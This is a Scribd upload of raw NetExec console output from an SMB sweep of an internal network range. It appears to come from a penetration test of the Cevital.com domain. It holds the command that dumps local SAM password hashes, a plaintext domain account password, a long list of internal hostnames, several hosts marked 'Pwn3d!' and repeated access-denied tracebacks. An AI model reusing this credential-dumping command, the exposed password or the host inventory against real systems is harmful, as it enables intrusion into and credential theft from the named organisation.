Scribd
Upload
8 views197 pages

Sam Hashes

Uploaded by

razielleibra
Copyright
© © All Rights Reserved
We take content rights seriously. If you suspect this is your content, claim it here.
Available Formats
Download as TXT, PDF, TXT or read online on Scribd
8 views197 pages

Sam Hashes

Uploaded by

razielleibra
Copyright
© © All Rights Reserved
We take content rights seriously. If you suspect this is your content, claim it here.
Available Formats
Download as TXT, PDF, TXT or read online on Scribd
You are on page 1/ 197

nxc smb 10.34.0.0/16 -u 'oxxo_pentest' -p 'p8Z49-#MX6?

ki@' --sam
SMB 10.34.160.43 445 OXOLT0200001 [*] Windows 11 Build 22621 x64
(name:OXOLT0200001) (domain:Cevital.com) (signing:True) (SMBv1:False)
SMB 10.34.160.16 445 OXODT020118 [*] Windows 11 Build 22621 x64
(name:OXODT020118) (domain:Cevital.com) (signing:True) (SMBv1:False)
SMB 10.34.160.35 445 OXOLT020056 [*] Windows 10.0 Build 26100
x64 (name:OXOLT020056) (domain:Cevital.com) (signing:True) (SMBv1:False)
SMB 10.34.160.11 445 OXODT020102 [*] Windows 10 / Server 2019
Build 19041 x64 (name:OXODT020102) (domain:Cevital.com) (signing:True)
(SMBv1:False)
SMB 10.34.160.30 445 OXODT020153 [*] Windows 11 Build 22621 x64
(name:OXODT020153) (domain:Cevital.com) (signing:True) (SMBv1:False)
SMB 10.34.160.82 445 OXODT020060 [*] Windows 10 / Server 2019
Build 19041 x64 (name:OXODT020060) (domain:Cevital.com) (signing:True)
(SMBv1:False)
SMB 10.34.160.27 445 OXOLT020021 [*] Windows 10.0 Build 26100
x64 (name:OXOLT020021) (domain:Cevital.com) (signing:True) (SMBv1:False)
SMB 10.34.160.13 445 OXODT020092 [*] Windows 10 / Server 2019
Build 19041 x64 (name:OXODT020092) (domain:Cevital.com) (signing:True)
(SMBv1:False)
SMB 10.34.160.37 445 OXODT020008 [*] Windows 11 Build 22621 x64
(name:OXODT020008) (domain:Cevital.com) (signing:True) (SMBv1:False)
SMB 10.34.160.130 445 OXODT020013 [*] Windows 11 Build 22621 x64
(name:OXODT020013) (domain:Cevital.com) (signing:True) (SMBv1:False)
SMB 10.34.160.17 445 OXODT020041 [*] Windows 11 Build 22621 x64
(name:OXODT020041) (domain:Cevital.com) (signing:True) (SMBv1:False)
SMB 10.34.160.40 445 OXODT020121 [*] Windows 11 Build 22621 x64
(name:OXODT020121) (domain:Cevital.com) (signing:True) (SMBv1:False)
SMB 10.34.160.126 445 OXOLT020044 [*] Windows 11 Build 22621 x64
(name:OXOLT020044) (domain:Cevital.com) (signing:True) (SMBv1:False)
SMB 10.34.160.41 445 OXODT020082 [*] Windows 10 / Server 2019
Build 19041 x64 (name:OXODT020082) (domain:Cevital.com) (signing:True)
(SMBv1:False)
SMB 10.34.160.64 445 OXODT02070006 [*] Windows 11 Build 22621 x64
(name:OXODT02070006) (domain:Cevital.com) (signing:True) (SMBv1:False)
SMB 10.34.160.32 445 OXODT020131 [*] Windows 11 Build 22621 x64
(name:OXODT020131) (domain:Cevital.com) (signing:True) (SMBv1:False)
SMB 10.34.160.22 445 OXODT020009 [*] Windows 11 Build 22621 x64
(name:OXODT020009) (domain:Cevital.com) (signing:True) (SMBv1:False)
SMB 10.34.160.120 445 OXODT020116 [*] Windows 11 Build 22621 x64
(name:OXODT020116) (domain:Cevital.com) (signing:True) (SMBv1:False)
SMB 10.34.160.116 445 OXODT020068 [*] Windows 11 Build 22621 x64
(name:OXODT020068) (domain:Cevital.com) (signing:True) (SMBv1:False)
SMB 10.34.160.74 445 OXODT020158 [*] Windows 11 Build 22621 x64
(name:OXODT020158) (domain:Cevital.com) (signing:True) (SMBv1:False)
SMB 10.34.160.222 445 NONE [*] OS 1.00 (name:) (domain:)
(signing:False) (SMBv1:True)
SMB 10.34.160.24 445 OXODT020088 [*] Windows 11 Build 22621 x64
(name:OXODT020088) (domain:Cevital.com) (signing:True) (SMBv1:False)
SMB 10.34.160.135 445 OXOLT020057 [*] Windows 11 Build 22621 x64
(name:OXOLT020057) (domain:Cevital.com) (signing:True) (SMBv1:False)
SMB 10.34.160.59 445 OXODT020127 [*] Windows 11 Build 22621 x64
(name:OXODT020127) (domain:Cevital.com) (signing:True) (SMBv1:False)
SMB 10.34.160.106 445 OXODT02070004 [*] Windows 11 Build 22621 x64
(name:OXODT02070004) (domain:Cevital.com) (signing:True) (SMBv1:False)
SMB 10.34.160.25 445 OXODT02090005 [*] Windows 11 Build 22621 x64
(name:OXODT02090005) (domain:Cevital.com) (signing:True) (SMBv1:False)
SMB 10.34.160.207 445 NONE [*] OS 1.00 (name:) (domain:)
(signing:False) (SMBv1:True)
SMB 10.34.160.39 445 OXODT020079 [*] Windows 11 Build 22621 x64
(name:OXODT020079) (domain:Cevital.com) (signing:True) (SMBv1:False)
SMB 10.34.160.110 445 OXODT020011 [*] Windows 11 Build 22621 x64
(name:OXODT020011) (domain:Cevital.com) (signing:True) (SMBv1:False)
SMB 10.34.160.45 445 OXODT020047 [*] Windows 11 Build 22621 x64
(name:OXODT020047) (domain:Cevital.com) (signing:True) (SMBv1:False)
SMB 10.34.160.136 445 OXODT020004 [*] Windows 11 Build 22621 x64
(name:OXODT020004) (domain:Cevital.com) (signing:True) (SMBv1:False)
SMB 10.34.160.23 445 CEVLAP2116 [*] Windows 11 Build 22621 x64
(name:CEVLAP2116) (domain:Cevital.com) (signing:True) (SMBv1:False)
SMB 10.34.160.146 445 OXOLT020059 [*] Windows 11 Build 22621 x64
(name:OXOLT020059) (domain:Cevital.com) (signing:True) (SMBv1:False)
SMB 10.34.160.80 445 OXODT020030 [*] Windows 11 Build 22621 x64
(name:OXODT020030) (domain:Cevital.com) (signing:True) (SMBv1:False)
SMB 10.34.160.113 445 OXODT020031 [*] Windows 11 Build 22621 x64
(name:OXODT020031) (domain:Cevital.com) (signing:True) (SMBv1:False)
SMB 10.34.160.127 445 OXODT020142 [*] Windows 10.0 Build 26100
x64 (name:OXODT020142) (domain:Cevital.com) (signing:True) (SMBv1:False)
SMB 10.34.161.1 445 OXODT02030007 [*] Windows 11 Build 22621 x64
(name:OXODT02030007) (domain:Cevital.com) (signing:True) (SMBv1:False)
SMB 10.34.160.61 445 OXOLT020024 [*] Windows 10.0 Build 26100
x64 (name:OXOLT020024) (domain:Cevital.com) (signing:True) (SMBv1:False)
SMB 10.34.160.70 445 OXODT020010 [*] Windows 11 Build 22621 x64
(name:OXODT020010) (domain:Cevital.com) (signing:True) (SMBv1:False)
SMB 10.34.160.122 445 OXODT02090006 [*] Windows 11 Build 22621 x64
(name:OXODT02090006) (domain:Cevital.com) (signing:True) (SMBv1:False)
SMB 10.34.160.132 445 OXODT020065 [*] Windows 11 Build 22621 x64
(name:OXODT020065) (domain:Cevital.com) (signing:True) (SMBv1:False)
SMB 10.34.160.54 445 OXODT020087 [*] Windows 11 Build 22621 x64
(name:OXODT020087) (domain:Cevital.com) (signing:True) (SMBv1:False)
SMB 10.34.160.97 445 OXODT020097 [*] Windows 11 Build 22621 x64
(name:OXODT020097) (domain:Cevital.com) (signing:True) (SMBv1:False)
SMB 10.34.161.9 445 OXODT02100006 [*] Windows 10 / Server 2019
Build 19041 x64 (name:OXODT02100006) (domain:Cevital.com) (signing:True)
(SMBv1:False)
SMB 10.34.161.2 445 OXODT02030003 [*] Windows 11 Build 22621 x64
(name:OXODT02030003) (domain:Cevital.com) (signing:True) (SMBv1:False)
SMB 10.34.160.154 445 OXOLT020010 [*] Windows 11 Build 22621 x64
(name:OXOLT020010) (domain:Cevital.com) (signing:True) (SMBv1:False)
SMB 10.34.161.8 445 OXODT02050012 [*] Windows 11 Build 22621 x64
(name:OXODT02050012) (domain:Cevital.com) (signing:True) (SMBv1:False)
SMB 10.34.161.13 445 OXODT020022 [*] Windows 10 / Server 2019
Build 19041 x64 (name:OXODT020022) (domain:Cevital.com) (signing:True)
(SMBv1:False)
SMB 10.34.160.92 445 OXODT020225 [*] Windows 11 Build 22621 x64
(name:OXODT020225) (domain:Cevital.com) (signing:True) (SMBv1:False)
SMB 10.34.160.18 445 OXODT020113 [*] Windows 11 Build 22621 x64
(name:OXODT020113) (domain:Cevital.com) (signing:True) (SMBv1:False)
SMB 10.34.160.49 445 NONE [*] OS 1.00 (name:) (domain:)
(signing:False) (SMBv1:True)
SMB 10.34.160.139 445 OXODT020151 [*] Windows 10.0 Build 26100
x64 (name:OXODT020151) (domain:Cevital.com) (signing:True) (SMBv1:False)
SMB 10.34.161.11 445 OXODT02030005 [*] Windows 10 / Server 2019
Build 19041 x64 (name:OXODT02030005) (domain:Cevital.com) (signing:True)
(SMBv1:False)
SMB 10.34.161.3 445 OXODT02060001 [*] Windows 11 Build 22621 x64
(name:OXODT02060001) (domain:Cevital.com) (signing:True) (SMBv1:False)
SMB 10.34.161.4 445 OXODT02060004 [*] Windows 11 Build 22621 x64
(name:OXODT02060004) (domain:Cevital.com) (signing:True) (SMBv1:False)
SMB 10.34.160.142 445 OXODT020077 [*] Windows 11 Build 22621 x64
(name:OXODT020077) (domain:Cevital.com) (signing:True) (SMBv1:False)
SMB 10.34.160.133 445 OXOLT020048 [*] Windows 11 Build 22621 x64
(name:OXOLT020048) (domain:Cevital.com) (signing:True) (SMBv1:False)
SMB 10.34.160.33 445 OXODT020019 [*] Windows 11 Build 22621 x64
(name:OXODT020019) (domain:Cevital.com) (signing:True) (SMBv1:False)
SMB 10.34.161.12 445 OXODT02030010 [*] Windows 10 / Server 2019
Build 19041 x64 (name:OXODT02030010) (domain:Cevital.com) (signing:True)
(SMBv1:False)
SMB 10.34.160.123 445 OXODT020227 [*] Windows 11 Build 22621 x64
(name:OXODT020227) (domain:Cevital.com) (signing:True) (SMBv1:False)
SMB 10.34.160.63 445 OXODT020037 [*] Windows 11 Build 22621 x64
(name:OXODT020037) (domain:Cevital.com) (signing:True) (SMBv1:False)
SMB 10.34.160.100 445 OXOLT020007 [*] Windows 10.0 Build 26100
x64 (name:OXOLT020007) (domain:Cevital.com) (signing:True) (SMBv1:False)
SMB 10.34.160.76 445 OXODT020146 [*] Windows 11 Build 22621 x64
(name:OXODT020146) (domain:Cevital.com) (signing:True) (SMBv1:False)
SMB 10.34.160.53 445 OXOLT020058 [*] Windows 11 Build 22621 x64
(name:OXOLT020058) (domain:Cevital.com) (signing:True) (SMBv1:False)
SMB 10.34.160.94 445 OXOLT020023 [*] Windows 11 Build 22621 x64
(name:OXOLT020023) (domain:Cevital.com) (signing:True) (SMBv1:False)
SMB 10.34.160.108 445 OXODT020108 [*] Windows 11 Build 22621 x64
(name:OXODT020108) (domain:Cevital.com) (signing:True) (SMBv1:False)
SMB 10.34.160.36 445 OXOLT020043 [*] Windows 10.0 Build 26100
x64 (name:OXOLT020043) (domain:Cevital.com) (signing:True) (SMBv1:False)
SMB 10.34.160.134 445 OXODT020115 [*] Windows 11 Build 22621 x64
(name:OXODT020115) (domain:Cevital.com) (signing:True) (SMBv1:False)
SMB 10.34.160.114 445 OXODT020135 [*] Windows 11 Build 22621 x64
(name:OXODT020135) (domain:Cevital.com) (signing:True) (SMBv1:False)
SMB 10.34.160.98 445 OXODT020021 [*] Windows 11 Build 22621 x64
(name:OXODT020021) (domain:Cevital.com) (signing:True) (SMBv1:False)
SMB 10.34.160.96 445 OXOLT020017 [*] Windows 11 Build 22621 x64
(name:OXOLT020017) (domain:Cevital.com) (signing:True) (SMBv1:False)
SMB 10.34.160.14 445 OXODT020156 [*] Windows 11 Build 22621 x64
(name:OXODT020156) (domain:Cevital.com) (signing:True) (SMBv1:False)
SMB 10.34.161.5 445 OXODT02060010 [*] Windows 11 Build 22621 x64
(name:OXODT02060010) (domain:Cevital.com) (signing:True) (SMBv1:False)
SMB 10.34.160.149 445 OXODT020149 [*] Windows 11 Build 22621 x64
(name:OXODT020149) (domain:Cevital.com) (signing:True) (SMBv1:False)
SMB 10.34.160.31 445 OXODT020091 [*] Windows 11 Build 22621 x64
(name:OXODT020091) (domain:Cevital.com) (signing:True) (SMBv1:False)
SMB 10.34.160.143 445 OXOLT020041 [*] Windows 11 Build 22621 x64
(name:OXOLT020041) (domain:Cevital.com) (signing:True) (SMBv1:False)
SMB 10.34.160.128 445 OXODT020063 [*] Windows 11 Build 22621 x64
(name:OXODT020063) (domain:Cevital.com) (signing:True) (SMBv1:False)
SMB 10.34.161.6 445 OXODT02040010 [*] Windows 11 Build 22621 x64
(name:OXODT02040010) (domain:Cevital.com) (signing:True) (SMBv1:False)
SMB 10.34.160.48 445 OXODT020104 [*] Windows 11 Build 22621 x64
(name:OXODT020104) (domain:Cevital.com) (signing:True) (SMBv1:False)
SMB 10.34.160.67 445 OXODT020141 [*] Windows 11 Build 22621 x64
(name:OXODT020141) (domain:Cevital.com) (signing:True) (SMBv1:False)
SMB 10.34.160.125 445 OXODT020007 [*] Windows 11 Build 22621 x64
(name:OXODT020007) (domain:Cevital.com) (signing:True) (SMBv1:False)
SMB 10.34.160.19 445 OXODT020042 [*] Windows 11 Build 22621 x64
(name:OXODT020042) (domain:Cevital.com) (signing:True) (SMBv1:False)
SMB 10.34.160.112 445 OXODT020226 [*] Windows 11 Build 22621 x64
(name:OXODT020226) (domain:Cevital.com) (signing:True) (SMBv1:False)
SMB 10.34.160.42 445 OXODT020006 [*] Windows 11 Build 22621 x64
(name:OXODT020006) (domain:Cevital.com) (signing:True) (SMBv1:False)
SMB 10.34.160.150 445 OXODT020101 [*] Windows 11 Build 22621 x64
(name:OXODT020101) (domain:Cevital.com) (signing:True) (SMBv1:False)
SMB 10.34.160.84 445 OXOLT020030 [*] Windows 10.0 Build 26100
x64 (name:OXOLT020030) (domain:Cevital.com) (signing:True) (SMBv1:False)
SMB 10.34.160.111 445 OXODT020099 [*] Windows 11 Build 22621 x64
(name:OXODT020099) (domain:Cevital.com) (signing:True) (SMBv1:False)
SMB 10.34.160.144 445 OXOLT020004 [*] Windows 11 Build 22621 x64
(name:OXOLT020004) (domain:Cevital.com) (signing:True) (SMBv1:False)
SMB 10.34.160.102 445 OXOLT020019 [*] Windows 11 Build 22621 x64
(name:OXOLT020019) (domain:Cevital.com) (signing:True) (SMBv1:False)
SMB 10.34.160.12 445 OXODT020086 [*] Windows 11 Build 22621 x64
(name:OXODT020086) (domain:Cevital.com) (signing:True) (SMBv1:False)
SMB 10.34.160.66 445 OXODT020020 [*] Windows 11 Build 22621 x64
(name:OXODT020020) (domain:Cevital.com) (signing:True) (SMBv1:False)
SMB 10.34.160.115 445 OXODT020114 [*] Windows 11 Build 22621 x64
(name:OXODT020114) (domain:Cevital.com) (signing:True) (SMBv1:False)
SMB 10.34.160.26 445 OXODT020070 [*] Windows 11 Build 22621 x64
(name:OXODT020070) (domain:Cevital.com) (signing:True) (SMBv1:False)
SMB 10.34.160.77 445 OXOLT020027 [*] Windows 11 Build 22621 x64
(name:OXOLT020027) (domain:Cevital.com) (signing:True) (SMBv1:False)
SMB 10.34.160.141 445 OXODT020105 [*] Windows 11 Build 22621 x64
(name:OXODT020105) (domain:Cevital.com) (signing:True) (SMBv1:False)
SMB 10.34.161.10 445 OXODT02010001 [*] Windows 10 / Server 2019
Build 19041 x64 (name:OXODT02010001) (domain:Cevital.com) (signing:True)
(SMBv1:False)
SMB 10.34.160.58 445 OXOLT020033 [*] Windows 11 Build 22621 x64
(name:OXOLT020033) (domain:Cevital.com) (signing:True) (SMBv1:False)
SMB 10.34.160.213 445 NONE [*] OS 1.00 (name:) (domain:)
(signing:False) (SMBv1:True)
SMB 10.34.161.15 445 OXODT02060051 [*] Windows 11 Build 22621 x64
(name:OXODT02060051) (domain:Cevital.com) (signing:True) (SMBv1:False)
SMB 10.34.161.17 445 OXODT02040004 [*] Windows 11 Build 22621 x64
(name:OXODT02040004) (domain:Cevital.com) (signing:True) (SMBv1:False)
SMB 10.34.161.24 445 OXODT02070011 [*] Windows 11 Build 22621 x64
(name:OXODT02070011) (domain:Cevital.com) (signing:True) (SMBv1:False)
SMB 10.34.161.20 445 OXODT02060005 [*] Windows 11 Build 22621 x64
(name:OXODT02060005) (domain:Cevital.com) (signing:True) (SMBv1:False)
SMB 10.34.161.18 445 OXODT02030008 [*] Windows 10 / Server 2019
Build 19041 x64 (name:OXODT02030008) (domain:Cevital.com) (signing:True)
(SMBv1:False)
SMB 10.34.161.14 445 OXODT02070005 [*] Windows 10.0 Build 26100
x64 (name:OXODT02070005) (domain:Cevital.com) (signing:True) (SMBv1:False)
SMB 10.34.161.19 445 OXODT02070021 [*] Windows 11 Build 22621 x64
(name:OXODT02070021) (domain:Cevital.com) (signing:True) (SMBv1:False)
SMB 10.34.161.22 445 OXODT02020002 [*] Windows 10 / Server 2019
Build 19041 x64 (name:OXODT02020002) (domain:Cevital.com) (signing:True)
(SMBv1:False)
SMB 10.34.160.56 445 OXOASP02007 [*] Windows 11 Build 22621 x64
(name:OXOASP02007) (domain:Cevital.com) (signing:False) (SMBv1:False)
SMB 10.34.161.29 445 OXODT02020001 [*] Windows 10 / Server 2019
Build 19041 x64 (name:OXODT02020001) (domain:Cevital.com) (signing:True)
(SMBv1:False)
SMB 10.34.161.37 445 OXODT02020004 [*] Windows 10 / Server 2019
Build 19041 x64 (name:OXODT02020004) (domain:Cevital.com) (signing:True)
(SMBv1:False)
SMB 10.34.160.43 445 OXOLT0200001 [+] Cevital.com\
oxxo_pentest:p8Z49-#MX6?ki@ (Pwn3d!)
SMB 10.34.161.31 445 OXODT02030013 [*] Windows 11 Build 22621 x64
(name:OXODT02030013) (domain:Cevital.com) (signing:True) (SMBv1:False)
SMB 10.34.161.28 445 OXODT02040007 [*] Windows 11 Build 22621 x64
(name:OXODT02040007) (domain:Cevital.com) (signing:True) (SMBv1:False)
SMB 10.34.161.40 445 OXODT02040006 [*] Windows 11 Build 22621 x64
(name:OXODT02040006) (domain:Cevital.com) (signing:True) (SMBv1:False)
SMB 10.34.161.30 445 OXODT02020005 [*] Windows 10 / Server 2019
Build 19041 x64 (name:OXODT02020005) (domain:Cevital.com) (signing:True)
(SMBv1:False)
SMB 10.34.161.31 445 OXODT02030013 [+] Cevital.com\
oxxo_pentest:p8Z49-#MX6?ki@ (Pwn3d!)
SMB 10.34.160.35 445 OXOLT020056 [+] Cevital.com\
oxxo_pentest:p8Z49-#MX6?ki@ (Pwn3d!)
SMB 10.34.160.11 445 OXODT020102 [+] Cevital.com\
oxxo_pentest:p8Z49-#MX6?ki@ (Pwn3d!)
SMB 10.34.160.30 445 OXODT020153 [+] Cevital.com\
oxxo_pentest:p8Z49-#MX6?ki@ (Pwn3d!)
SMB 10.34.160.82 445 OXODT020060 [+] Cevital.com\
oxxo_pentest:p8Z49-#MX6?ki@ (Pwn3d!)
[03:24:17] ERROR DCERPC Runtime Error: code: 0x5 - rpc_s_access_denied
smb.py:1518
╭────────────────────────────────────────────────────────────
Traceback (most recent call last)
────────────────────────────────────────────────────────────╮
│ /usr/lib/python3/dist-packages/nxc/protocols/smb.py:1496 in
sam



│ 1493 │ │ │ add_sam_hash.sam_hashes = 0

│ 1494 │ │ │

│ 1495 │ │ │ if self.remote_ops and self.bootkey:

│ ❱ 1496 │ │ │ │ SAM_file_name =
self.remote_ops.saveSAM()

│ 1497 │ │ │ │ SAM = SAMHashes(

│ 1498 │ │ │ │ │ SAM_file_name,

│ 1499 │ │ │ │ │ self.bootkey,




/usr/lib/python3/dist-packages/impacket/examples/secretsdump.py:934 in saveSAM



│ 931 │

│ 932 │ def saveSAM(self):

│ 933 │ │ LOG.debug('Saving remote SAM database')

│ ❱ 934 │ │ return self.__retrieveHive('SAM')

│ 935 │

│ 936 │ def saveSECURITY(self):

│ 937 │ │ LOG.debug('Saving remote SECURITY database')




/usr/lib/python3/dist-packages/impacket/examples/secretsdump.py:925 in
__retrieveHive



│ 922 │ │ except:

│ 923 │ │ │ raise Exception("Can't open %s hive" %
hiveName)

│ 924 │ │ keyHandle = ans['phkResult']

│ ❱ 925 │ │ rrp.hBaseRegSaveKey(self.__rrp, keyHandle,
'..\\Temp\\'+tmpFileName)

│ 926 │ │ rrp.hBaseRegCloseKey(self.__rrp, keyHandle)

│ 927 │ │ rrp.hBaseRegCloseKey(self.__rrp, regHandle)

│ 928 │ │ # Now let's open the remote file, so it can be
read later



│ /usr/lib/python3/dist-packages/impacket/dcerpc/v5/rrp.py:946
in hBaseRegSaveKey



│ 943 │ request['hKey'] = hKey

│ 944 │ request['lpFile'] = checkNullString(lpFile)

│ 945 │ request['pSecurityAttributes'] =
pSecurityAttributes

│ ❱ 946 │ return dce.request(request)

│ 947

│ 948 def hBaseRegSetValue(dce, hKey, lpValueName, dwType,
lpData):

│ 949 │ request = BaseRegSetValue()




/usr/lib/python3/dist-packages/impacket/dcerpc/v5/rpcrt.py:882 in request



│ 879 │ │ │ │ │ exception =
sessionErrorClass(error_code = error_code)

│ 880 │ │ │ │ else:

│ 881 │ │ │ │ │ exception =
sessionErrorClass(packet = response, error_code =

│ error_code)

│ ❱ 882 │ │ │ raise exception

│ 883 │ │ else:

│ 884 │ │ │ response = respClass(answer, isNDR64 =
isNDR64)

│ 885 │ │ │ return response

╰──────────────────────────────────────────────────────────────────────────────────
─────────────────────────────────────────────────────────────────────────╯

DCERPCException: DCERPC Runtime Error: code: 0x5 -


rpc_s_access_denied

ERROR DCERPC Runtime Error: code: 0x5 - rpc_s_access_denied


smb.py:1518
╭────────────────────────────────────────────────────────────
Traceback (most recent call last)
────────────────────────────────────────────────────────────╮
│ /usr/lib/python3/dist-packages/nxc/protocols/smb.py:1496 in
sam



│ 1493 │ │ │ add_sam_hash.sam_hashes = 0

│ 1494 │ │ │

│ 1495 │ │ │ if self.remote_ops and self.bootkey:

│ ❱ 1496 │ │ │ │ SAM_file_name =
self.remote_ops.saveSAM()

│ 1497 │ │ │ │ SAM = SAMHashes(

│ 1498 │ │ │ │ │ SAM_file_name,

│ 1499 │ │ │ │ │ self.bootkey,




/usr/lib/python3/dist-packages/impacket/examples/secretsdump.py:934 in saveSAM



│ 931 │

│ 932 │ def saveSAM(self):

│ 933 │ │ LOG.debug('Saving remote SAM database')

│ ❱ 934 │ │ return self.__retrieveHive('SAM')

│ 935 │

│ 936 │ def saveSECURITY(self):

│ 937 │ │ LOG.debug('Saving remote SECURITY database')




/usr/lib/python3/dist-packages/impacket/examples/secretsdump.py:925 in
__retrieveHive



│ 922 │ │ except:

│ 923 │ │ │ raise Exception("Can't open %s hive" %
hiveName)

│ 924 │ │ keyHandle = ans['phkResult']

│ ❱ 925 │ │ rrp.hBaseRegSaveKey(self.__rrp, keyHandle,
'..\\Temp\\'+tmpFileName)

│ 926 │ │ rrp.hBaseRegCloseKey(self.__rrp, keyHandle)

│ 927 │ │ rrp.hBaseRegCloseKey(self.__rrp, regHandle)

│ 928 │ │ # Now let's open the remote file, so it can be
read later



│ /usr/lib/python3/dist-packages/impacket/dcerpc/v5/rrp.py:946
in hBaseRegSaveKey



│ 943 │ request['hKey'] = hKey

│ 944 │ request['lpFile'] = checkNullString(lpFile)

│ 945 │ request['pSecurityAttributes'] =
pSecurityAttributes

│ ❱ 946 │ return dce.request(request)

│ 947

│ 948 def hBaseRegSetValue(dce, hKey, lpValueName, dwType,
lpData):

│ 949 │ request = BaseRegSetValue()




/usr/lib/python3/dist-packages/impacket/dcerpc/v5/rpcrt.py:882 in request



│ 879 │ │ │ │ │ exception =
sessionErrorClass(error_code = error_code)

│ 880 │ │ │ │ else:

│ 881 │ │ │ │ │ exception =
sessionErrorClass(packet = response, error_code =

│ error_code)

│ ❱ 882 │ │ │ raise exception

│ 883 │ │ else:

│ 884 │ │ │ response = respClass(answer, isNDR64 =
isNDR64)

│ 885 │ │ │ return response

╰──────────────────────────────────────────────────────────────────────────────────
─────────────────────────────────────────────────────────────────────────╯

DCERPCException: DCERPC Runtime Error: code: 0x5 -


rpc_s_access_denied

SMB 10.34.160.27 445 OXOLT020021 [+] Cevital.com\


oxxo_pentest:p8Z49-#MX6?ki@ (Pwn3d!)
[03:24:18] ERROR DCERPC Runtime Error: code: 0x5 - rpc_s_access_denied
smb.py:1518
╭────────────────────────────────────────────────────────────
Traceback (most recent call last)
────────────────────────────────────────────────────────────╮
│ /usr/lib/python3/dist-packages/nxc/protocols/smb.py:1496 in
sam



│ 1493 │ │ │ add_sam_hash.sam_hashes = 0

│ 1494 │ │ │

│ 1495 │ │ │ if self.remote_ops and self.bootkey:

│ ❱ 1496 │ │ │ │ SAM_file_name =
self.remote_ops.saveSAM()

│ 1497 │ │ │ │ SAM = SAMHashes(

│ 1498 │ │ │ │ │ SAM_file_name,

│ 1499 │ │ │ │ │ self.bootkey,




/usr/lib/python3/dist-packages/impacket/examples/secretsdump.py:934 in saveSAM



│ 931 │

│ 932 │ def saveSAM(self):

│ 933 │ │ LOG.debug('Saving remote SAM database')

│ ❱ 934 │ │ return self.__retrieveHive('SAM')

│ 935 │

│ 936 │ def saveSECURITY(self):

│ 937 │ │ LOG.debug('Saving remote SECURITY database')




/usr/lib/python3/dist-packages/impacket/examples/secretsdump.py:925 in
__retrieveHive



│ 922 │ │ except:

│ 923 │ │ │ raise Exception("Can't open %s hive" %
hiveName)

│ 924 │ │ keyHandle = ans['phkResult']

│ ❱ 925 │ │ rrp.hBaseRegSaveKey(self.__rrp, keyHandle,
'..\\Temp\\'+tmpFileName)

│ 926 │ │ rrp.hBaseRegCloseKey(self.__rrp, keyHandle)

│ 927 │ │ rrp.hBaseRegCloseKey(self.__rrp, regHandle)

│ 928 │ │ # Now let's open the remote file, so it can be
read later



│ /usr/lib/python3/dist-packages/impacket/dcerpc/v5/rrp.py:946
in hBaseRegSaveKey



│ 943 │ request['hKey'] = hKey

│ 944 │ request['lpFile'] = checkNullString(lpFile)

│ 945 │ request['pSecurityAttributes'] =
pSecurityAttributes

│ ❱ 946 │ return dce.request(request)

│ 947

│ 948 def hBaseRegSetValue(dce, hKey, lpValueName, dwType,
lpData):

│ 949 │ request = BaseRegSetValue()




/usr/lib/python3/dist-packages/impacket/dcerpc/v5/rpcrt.py:882 in request



│ 879 │ │ │ │ │ exception =
sessionErrorClass(error_code = error_code)

│ 880 │ │ │ │ else:

│ 881 │ │ │ │ │ exception =
sessionErrorClass(packet = response, error_code =

│ error_code)

│ ❱ 882 │ │ │ raise exception

│ 883 │ │ else:

│ 884 │ │ │ response = respClass(answer, isNDR64 =
isNDR64)

│ 885 │ │ │ return response

╰──────────────────────────────────────────────────────────────────────────────────
─────────────────────────────────────────────────────────────────────────╯

DCERPCException: DCERPC Runtime Error: code: 0x5 -


rpc_s_access_denied

SMB 10.34.160.13 445 OXODT020092 [+] Cevital.com\


oxxo_pentest:p8Z49-#MX6?ki@ (Pwn3d!)
[03:24:19] ERROR DCERPC Runtime Error: code: 0x5 - rpc_s_access_denied
smb.py:1518
╭────────────────────────────────────────────────────────────
Traceback (most recent call last)
────────────────────────────────────────────────────────────╮
│ /usr/lib/python3/dist-packages/nxc/protocols/smb.py:1496 in
sam



│ 1493 │ │ │ add_sam_hash.sam_hashes = 0

│ 1494 │ │ │

│ 1495 │ │ │ if self.remote_ops and self.bootkey:

│ ❱ 1496 │ │ │ │ SAM_file_name =
self.remote_ops.saveSAM()

│ 1497 │ │ │ │ SAM = SAMHashes(

│ 1498 │ │ │ │ │ SAM_file_name,

│ 1499 │ │ │ │ │ self.bootkey,




/usr/lib/python3/dist-packages/impacket/examples/secretsdump.py:934 in saveSAM



│ 931 │

│ 932 │ def saveSAM(self):

│ 933 │ │ LOG.debug('Saving remote SAM database')

│ ❱ 934 │ │ return self.__retrieveHive('SAM')

│ 935 │

│ 936 │ def saveSECURITY(self):

│ 937 │ │ LOG.debug('Saving remote SECURITY database')




/usr/lib/python3/dist-packages/impacket/examples/secretsdump.py:925 in
__retrieveHive



│ 922 │ │ except:

│ 923 │ │ │ raise Exception("Can't open %s hive" %
hiveName)

│ 924 │ │ keyHandle = ans['phkResult']

│ ❱ 925 │ │ rrp.hBaseRegSaveKey(self.__rrp, keyHandle,
'..\\Temp\\'+tmpFileName)

│ 926 │ │ rrp.hBaseRegCloseKey(self.__rrp, keyHandle)

│ 927 │ │ rrp.hBaseRegCloseKey(self.__rrp, regHandle)

│ 928 │ │ # Now let's open the remote file, so it can be
read later



│ /usr/lib/python3/dist-packages/impacket/dcerpc/v5/rrp.py:946
in hBaseRegSaveKey



│ 943 │ request['hKey'] = hKey

│ 944 │ request['lpFile'] = checkNullString(lpFile)

│ 945 │ request['pSecurityAttributes'] =
pSecurityAttributes

│ ❱ 946 │ return dce.request(request)

│ 947

│ 948 def hBaseRegSetValue(dce, hKey, lpValueName, dwType,
lpData):

│ 949 │ request = BaseRegSetValue()




/usr/lib/python3/dist-packages/impacket/dcerpc/v5/rpcrt.py:882 in request



│ 879 │ │ │ │ │ exception =
sessionErrorClass(error_code = error_code)

│ 880 │ │ │ │ else:

│ 881 │ │ │ │ │ exception =
sessionErrorClass(packet = response, error_code =

│ error_code)

│ ❱ 882 │ │ │ raise exception

│ 883 │ │ else:

│ 884 │ │ │ response = respClass(answer, isNDR64 =
isNDR64)

│ 885 │ │ │ return response

╰──────────────────────────────────────────────────────────────────────────────────
─────────────────────────────────────────────────────────────────────────╯

DCERPCException: DCERPC Runtime Error: code: 0x5 -


rpc_s_access_denied

ERROR DCERPC Runtime Error: code: 0x5 - rpc_s_access_denied


smb.py:1518
╭────────────────────────────────────────────────────────────
Traceback (most recent call last)
────────────────────────────────────────────────────────────╮
│ /usr/lib/python3/dist-packages/nxc/protocols/smb.py:1496 in
sam



│ 1493 │ │ │ add_sam_hash.sam_hashes = 0

│ 1494 │ │ │

│ 1495 │ │ │ if self.remote_ops and self.bootkey:

│ ❱ 1496 │ │ │ │ SAM_file_name =
self.remote_ops.saveSAM()

